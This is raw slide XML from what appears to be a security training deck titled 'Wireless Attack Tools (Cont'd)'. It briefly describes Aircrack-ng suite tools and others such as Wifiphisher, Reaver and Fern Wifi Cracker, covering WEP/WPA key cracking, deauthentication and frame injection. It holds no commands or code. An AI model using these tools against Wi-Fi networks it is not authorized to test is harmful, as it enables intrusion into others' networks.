                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FE8562-5CE6-430F-9DD2-FD9EE9986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012" y="4362871"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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en-US" sz="1800" b="0" i="0" u="sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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52985945-76BD-4AA4-9C6F-A1518526E2D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="170656" y="629967"/>
            <a:ext cx="1710661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Airdecloak-ng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B58E4C6D-DD61-45E5-BAC5-6DB7F1125191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16128" y="994312"/>
            <a:ext cx="2021242" cy="5539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Removes WEP cloaking from a pcap file</a:t>
            </a:r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9CF83DE0-0692-40EF-8AC4-A9DDADB54113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698074" y="27858"/>
            <a:ext cx="655827" cy="611701"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4F81BD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9</a:t>
            </a:r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EFFC7610-CA54-4D1B-AF9C-9115FCCEED98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2726067" y="27858"/>
            <a:ext cx="655827" cy="611701"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C0504D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prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>10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82C9D23C-2925-4F11-851D-55E694DBB025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2376551" y="629967"/>
            <a:ext cx="1354858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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Airdrop-ng</a:t>
            </a:r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51113826-87F2-4E86-90F1-47EE3D6AA1AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060246" y="994312"/>
            <a:ext cx="2019718" cy="78483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Used for targeted, rule-based deauthentication of users</a:t>
            </a:r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A6720A21-C5CD-44B9-8C9A-7A1DFAF1DB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759518" y="27858"/>
            <a:ext cx="655827" cy="611701"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9BBB5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11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66C4E311-051A-455D-9D6F-661ED35960B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4327960" y="629967"/>
            <a:ext cx="1518942" cy="35394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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Aireplay-ng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FDD4E306-6A41-401F-A688-2A58801562D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084325" y="994312"/>
            <a:ext cx="2019717" cy="124649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Used for traffic generation, fake authentication, packet replay, and ARP request injection</a:t>
            </a:r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074EE69D-8A35-462B-855D-B486D02DC451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698074" y="2205804"/>
            <a:ext cx="655827" cy="611701"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8064A2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13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5746511D-9584-4B65-A688-F79758767DC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221118" y="2814610"/>
            <a:ext cx="1609736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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Airodump-ng</a:t>
            </a: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2CDCA62E-EF37-4B72-8C6C-65C1FBECA591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-84585" y="3099634"/>
            <a:ext cx="2215685" cy="78483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Used to capture packets of raw 802.11 frames and collect WEP IVs</a:t>
            </a:r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3EBDA251-F936-4AA9-B81F-F96FCAAE358F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697857" y="4403544"/>
            <a:ext cx="655827" cy="611701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</a:rPr>
              <a:t>14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69500CA5-1392-4DCB-B4AC-D539035C6EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388416" y="5012350"/>
            <a:ext cx="1274708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Airolib-ng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9A41C2B5-E10E-4EE4-8360-BD7362230A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21369" y="5297374"/>
            <a:ext cx="2039781" cy="101566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Stores and manages essid and password lists used in WPA/WPA2 cracking</a:t>
            </a:r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F0EBA01E-973E-4EFC-86E6-779BB00C08A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731308" y="4403544"/>
            <a:ext cx="655827" cy="611701"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F79646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15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37538B64-BD5C-43B1-A1CC-F3F292A71F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2356272" y="5012350"/>
            <a:ext cx="1405899" cy="35394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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Airserv-ng</a:t>
            </a:r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944C5597-431E-4725-AF74-181898D6B294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029299" y="5297374"/>
            <a:ext cx="2039781" cy="124649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Allows multiple programs to indepen-dently use a Wi-Fi card via a client-server TCP connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Oval 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299B979C-3843-42E4-8486-6A30BFD9E324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4776534" y="4374059"/>
            <a:ext cx="652791" cy="608870"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4F81BD"/>
          </a:solidFill>
          <a:ln w="381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16</a:t>
            </a:r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AC5CBB80-C5E2-4BB9-9176-BF0E12DEF204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4411874" y="4969907"/>
            <a:ext cx="1382110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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tkiptun-ng</a:t>
            </a:r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069DF613-0525-46F4-96B8-FA2CBCEDB9D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4076942" y="5262390"/>
            <a:ext cx="2027137" cy="124649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Injects frames into a WPA TKIP network with QoS and can recover a MIC key and keystream from Wi-Fi traffic</a:t>
            </a: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E1D1DBDB-7798-4FDD-8553-272CF628EE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6774000" y="29781"/>
            <a:ext cx="652791" cy="608870"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C0504D"/>
          </a:solidFill>
          <a:ln w="381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 dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>12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0457ED21-0D8E-4534-B119-126657A7D44C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6394593" y="629967"/>
            <a:ext cx="1411605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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wesside-ng</a:t>
            </a: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9C1C74D6-3C23-4239-A99A-78703793C4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6112525" y="994312"/>
            <a:ext cx="1991400" cy="124649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Incorporates different techniques to seamlessly obtain a WEP key within minutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Oval 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA7BD9D8-7365-41FD-91BE-44B09CF9365C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6804475" y="4375450"/>
            <a:ext cx="652791" cy="608870"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9BBB59"/>
          </a:solidFill>
          <a:ln w="381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 dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>17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1CD9CB86-E320-456C-9A41-D13026F77AB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579276" y="4971298"/>
            <a:ext cx="1103187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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WZCook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BDEF63A3-72E4-4B15-BCEC-9F6ACEAE15EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166948" y="5263781"/>
            <a:ext cx="1973781" cy="101566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Recovers WEP keys from XP’s wireless zero configuration utility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8E0E32F9-E60A-444F-9B71-D77520E608C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2516899" y="2742434"/>
            <a:ext cx="5148543" cy="1077218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Wireless Attack Tools (Cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="32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5346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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" advClick="0"/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ound Same Side Corner Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17052F3-FB2D-4CDB-821E-8EA1A66C3241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5338415" y="-4484178"/>
            <a:ext cx="1063833" cy="11740662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2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/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9419" tIns="109710" rIns="219419" bIns="109710"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bg-BG" dirty="0">
              <a:latin typeface="Lato Light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AB4D178-A790-4F0D-9C06-012690D486E7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141413" y="158750"/>
            <a:ext cx="9909175" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Wireless Attack Tools (Cont’d)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1ED1BA9D-30B9-414E-9B0E-309BED85A222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135554" y="1060808"/>
            <a:ext cx="2217246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/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AirMagnet WiFi Analyzer PRO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6A3FD853-26F0-4AE2-A77C-231CE995CEDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3443384" y="1062988"/>
            <a:ext cx="7552095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>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>It is used to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reliable Wi-Fi analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of 802.11a/b/g/n/ax wireless networks without missing any traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="https://www.netally.com/wp-content/uploads/2019/06/Never-Miss-Any-Wi-Fi-Traffic.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E04AEAE4-B8DC-493F-B2F9-B984BB9141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5933" y="2079958"/>
            <a:ext cx="8042772" cy="435231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26E02001-A411-42C0-BE1B-07909F6AA7DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6058304" y="6196246"/>
            <a:ext cx="1494320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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0"/>
              <a:t>https://www.netally.com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9F09E7A8-94D7-4BDB-95C0-4C7A26480F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9658244" y="2174559"/>
            <a:ext cx="2381355" cy="5078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en-US" sz="1500" b="1" dirty="0"/>
              <a:t>Ettercap  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t>https://www.ettercap-project.org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5E3672C5-0872-4B04-A205-CA737D36CC8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9658244" y="3048782"/>
            <a:ext cx="2120900" cy="5078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en-US" sz="1500" b="1" dirty="0" err="1"/>
              <a:t>Wifiphisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t>https://wifiphisher.org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255C75F1-3E0E-4B19-82C5-EBF2371E0565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9658244" y="3900836"/>
            <a:ext cx="2120900" cy="5078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en-US" sz="1500" b="1" dirty="0"/>
              <a:t>Reaver </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0"/>
              <a:t>https://github.com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9336C7D5-0B7A-479E-988F-8063F6691098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9658244" y="4848881"/>
            <a:ext cx="2120900" cy="5078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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Cracker  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://github.com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B71B9B28-E923-49DB-BC03-01210EDF038F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9658244" y="5579210"/>
            <a:ext cx="2381355" cy="73866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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elcomsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Wireless Security Auditor</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.elcomsoft.com</a:t>
            </a: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F74F316F-A8CE-4B1C-A657-F10776BAB29C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1050176"/>
            <a:ext cx="666206" cy="666206"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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27" name="Round Same Side Corner Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8395DD5D-3ED5-4093-8685-491CEA0AC150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="935491" y="1004456"/>
            <a:ext cx="55108" cy="801664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31" name="Freeform 141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAE319D-CD54-4E3B-B965-7847FE6A2907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286447" y="1199697"/>
            <a:ext cx="404943" cy="378493"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 189424 w 59"/>
              <a:gd name="T1" fmla="*/ 201612 h 59"/>
              <a:gd name="T2" fmla="*/ 175647 w 59"/>
              <a:gd name="T3" fmla="*/ 198195 h 59"/>
              <a:gd name="T4" fmla="*/ 134319 w 59"/>
              <a:gd name="T5" fmla="*/ 157189 h 59"/>
              <a:gd name="T6" fmla="*/ 86102 w 59"/>
              <a:gd name="T7" fmla="*/ 170858 h 59"/>
              <a:gd name="T8" fmla="*/ 0 w 59"/>
              <a:gd name="T9" fmla="*/ 85429 h 59"/>
              <a:gd name="T10" fmla="*/ 86102 w 59"/>
              <a:gd name="T11" fmla="*/ 0 h 59"/>
              <a:gd name="T12" fmla="*/ 172203 w 59"/>
              <a:gd name="T13" fmla="*/ 85429 h 59"/>
              <a:gd name="T14" fmla="*/ 158427 w 59"/>
              <a:gd name="T15" fmla="*/ 133269 h 59"/>
              <a:gd name="T16" fmla="*/ 199756 w 59"/>
              <a:gd name="T17" fmla="*/ 177692 h 59"/>
              <a:gd name="T18" fmla="*/ 203200 w 59"/>
              <a:gd name="T19" fmla="*/ 187943 h 59"/>
              <a:gd name="T20" fmla="*/ 189424 w 59"/>
              <a:gd name="T21" fmla="*/ 201612 h 59"/>
              <a:gd name="T22" fmla="*/ 86102 w 59"/>
              <a:gd name="T23" fmla="*/ 30754 h 59"/>
              <a:gd name="T24" fmla="*/ 30997 w 59"/>
              <a:gd name="T25" fmla="*/ 85429 h 59"/>
              <a:gd name="T26" fmla="*/ 86102 w 59"/>
              <a:gd name="T27" fmla="*/ 140103 h 59"/>
              <a:gd name="T28" fmla="*/ 141207 w 59"/>
              <a:gd name="T29" fmla="*/ 85429 h 59"/>
              <a:gd name="T30" fmla="*/ 86102 w 59"/>
              <a:gd name="T31" fmla="*/ 30754 h 59"/>
              <a:gd name="T32" fmla="*/ 123986 w 59"/>
              <a:gd name="T33" fmla="*/ 88846 h 59"/>
              <a:gd name="T34" fmla="*/ 120542 w 59"/>
              <a:gd name="T35" fmla="*/ 92263 h 59"/>
              <a:gd name="T36" fmla="*/ 51661 w 59"/>
              <a:gd name="T37" fmla="*/ 92263 h 59"/>
              <a:gd name="T38" fmla="*/ 44773 w 59"/>
              <a:gd name="T39" fmla="*/ 88846 h 59"/>
              <a:gd name="T40" fmla="*/ 44773 w 59"/>
              <a:gd name="T41" fmla="*/ 82012 h 59"/>
              <a:gd name="T42" fmla="*/ 51661 w 59"/>
              <a:gd name="T43" fmla="*/ 78595 h 59"/>
              <a:gd name="T44" fmla="*/ 120542 w 59"/>
              <a:gd name="T45" fmla="*/ 78595 h 59"/>
              <a:gd name="T46" fmla="*/ 123986 w 59"/>
              <a:gd name="T47" fmla="*/ 82012 h 59"/>
              <a:gd name="T48" fmla="*/ 123986 w 59"/>
              <a:gd name="T49" fmla="*/ 88846 h 59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9" h="59">
                <a:moveTo>
                  <a:pt x="55" y="59"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="59"/>
                  <a:pt x="52" y="59"/>
                  <a:pt x="51" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="46"/>
                  <a:pt x="39" y="46"/>
                  <a:pt x="39" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="49"/>
                  <a:pt x="30" y="50"/>
                  <a:pt x="25" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="50"/>
                  <a:pt x="0" y="39"/>
                  <a:pt x="0" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="11"/>
                  <a:pt x="11" y="0"/>
                  <a:pt x="25" y="0"/>
